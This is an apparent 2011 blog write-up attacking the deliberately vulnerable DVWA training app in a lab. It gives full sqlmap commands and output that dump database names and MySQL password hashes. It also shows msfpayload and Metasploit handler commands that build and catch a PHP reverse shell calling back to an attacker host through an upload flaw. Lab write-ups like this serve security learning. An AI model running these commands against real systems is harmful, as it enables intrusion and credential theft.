Wednesday 1 June 2011

DVWA

Brute Force

Brute forcing is a term used to describe what I call a trial and error process of guessing a application or service's user and/or password. There are many tools around to automate this for different applications or services.
The DVWA - Brute Force section has a HTML form where you can practice bruteforce username/password attacks.
I'm going to demonstrate this with FireForce a Mozilla Firefox plugin that can Brute Force attack on GET or POST forms.
Here's a small demo of it in action:


SQL Injection

SQL Injection is a technique used to inject code which will be understood by the database through the database front end of an application; the vulnerability occurs due to a programmer's insecure or non-sanitization of escape characters which are injected through SQL commands or statements in user input fields.
There are many ways to defeat the SQL Injection section of the DVWA. I used SQLMap and Tamper Data FF plugin.
Fire up DVWA, login with admin and password and set the security level to LOW.
Open the SQL Injection section and test for injection with the character 1.
You should see Output below as follows:
ID: 1
First name: admin
Surname: admin
From here you can see the form is vulnerable to SQL Injection.
Now open up Tamper Data FF plugin and click start tamper; click on the SQL Injection link again on the RHS; this will reset the form, now perform the SQL Injection again, enter character 1 and click Submit. Open up Tamper Data and copy the cookie, including 'PHPSESSID' and paste it into kate or some other notepad derivative; also while you have it open make a note of the URL. You'll see why in a second.
Next open a terminal and cd to your SQLMap directory, and start building your syntax, here's what I used.
python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --dbs
Ill break this down for you:
-u URL of the form page | --cookie the cookie you copied from Tamper Data with the security level | --string this is what SQLMap uses to confirm the query is vaild | --dbs - this enumerates DBMS databases
This should give you output similar to this:
    sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:38:12

[10:38:13] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:38:13] [INFO] resuming string match 'Surname' from session file
[10:38:13] [INFO] resuming injection point 'GET' from session file
[10:38:13] [INFO] resuming injection parameter 'id' from session file
[10:38:13] [INFO] resuming injection type 'stringsingle' from session file
[10:38:13] [INFO] resuming 0 number of parenthesis from session file
[10:38:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:38:13] [INFO] testing connection to the target url
[10:38:13] [INFO] testing for parenthesis on injectable parameter
[10:38:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:38:13] [INFO] fetching database names
[10:38:13] [INFO] fetching number of databases
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 3
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': information_schema
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': dvwa
[10:38:13] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': mysql
available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql

[10:38:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:38:13
Brilliant! - Here you can clearly see you have enumerated the database names, dvwa, information_schema and mysql! Now lets see if we can get some usernames and passwords?
Here's the syntax I used:
python sqlmap.py -u 'http://10.50.60.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=e56cf09be661f8e3374cebdf65fb56b2; security=low' --string="Surname" --users --password
The only difference here is:
 --users which enumerates DBMS users and --passwords which does the same with password hashes
You should get output similar to this:
sqlmap/0.9-dev - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:39:09

[10:39:10] [INFO] using '/pentest/database/sqlmap/output/10.50.60.116/session' as session file
[10:39:10] [INFO] resuming string match 'Surname' from session file
[10:39:10] [INFO] resuming injection point 'GET' from session file
[10:39:10] [INFO] resuming injection parameter 'id' from session file
[10:39:10] [INFO] resuming injection type 'stringsingle' from session file
[10:39:10] [INFO] resuming 0 number of parenthesis from session file
[10:39:10] [INFO] resuming back-end DBMS 'mysql 5' from session file
[10:39:10] [INFO] testing connection to the target url
[10:39:10] [INFO] testing for parenthesis on injectable parameter
[10:39:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL 5
[10:39:10] [INFO] fetching database users
[10:39:10] [INFO] fetching number of database users
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 4
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'localhost'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'dojo-vm'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'root'@'127.0.0.1'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:39:10] [INFO] fetching database users password hashes
[10:39:10] [INFO] fetching number of password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'root'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[10:39:10] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': 1
[10:39:10] [INFO] fetching password hashes for user 'debian-sys-maint'
[10:39:10] [INFO] read from file '/pentest/database/sqlmap/output/10.50.60.116/session': *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *9FAA9B6E006E3CE7833F3C3C4C97B8628A017CDC
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[10:39:10] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.50.60.116'

[*] shutting down at: 10:39:10
Excellent! - Now you have the password hashes for root and debian-sys-main! You can now use your favourite password cracker to decrypt the passwords from the hashes.
Here's a short video showing how I did it:



CSRF

First of all I'd like to describe a Cross site request forgery; this is not a new thing and is a technique that has been around for many years; its also known as session riding in the black hat world. A CSRF is basically a set of commands spoofed to look like they are coming from a "trusted" user. Unlike, what I like to call it's Cousin; the XSS or Cross Site Script as it exploits the trust that a site has in a user's browser rather than exploiting the trust a user has for a particular site.
Tonight I will be attacking the CSRF Section of the DVWA.
I'll be using Firefox, FireBug, FoxyProxy, OWASP's CSRFTester and good ol' Kate all available in the awesome Back|Track4.
Ill capture a genuine HTTP request to change password, using CSRFTester and FoxyProxy; then edit the HTTP request from GET to POST with Kate - to show the proof of concept, ill then open this edited HTTP request with firefox and forge a password request from the Web Application.
During the password change, Ill edit the page with FireBug to show the password change.



Upload Exploitation
In this video I'll create a PHP payload with MsfPayload:
msfpayload php/meterpreter/reverse_tcp LHOST=10.50.60.161 LPORT=8080 R > connectback.php
Also, I'll edit the connectback.php script to remove the "safety latch" the # on line 1.
Then setup Metasploit to handle the reverse connection:
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.50.60.161
set LPORT 8080
exploit
I'll then use the Upload section of DVWA to upload the payload, check out the source and browse to the upload directory http://10.50.60.193/dvwa/hackable/uploads and execute the connectback.php script.
This will give me a session on DVWA has www-data user (apache).



Posted by at No comments:
Labels: , , , , ,
Subscribe to: Posts (Atom)